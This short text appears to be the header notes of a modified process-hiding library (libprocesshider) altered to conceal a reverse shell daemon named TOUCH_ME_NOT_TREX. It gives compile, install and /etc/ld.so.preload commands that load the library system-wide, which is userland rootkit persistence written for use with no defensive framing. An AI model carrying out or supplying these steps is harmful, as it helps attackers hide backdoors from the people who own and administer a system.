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Processhider.c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Processhider.c modified to hide process named TOUCH_ME_NOT_TREX (reverse shell shell process daemon).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Modified to do a strstr() instead of strcmp() due to variability of invocation pathname.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Compile with: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gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl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mv libprocesshider.so /usr/local/lib/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Preload with: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/usr/local/lib/libprocesshider.so &gt;&gt; /etc/ld.so.preload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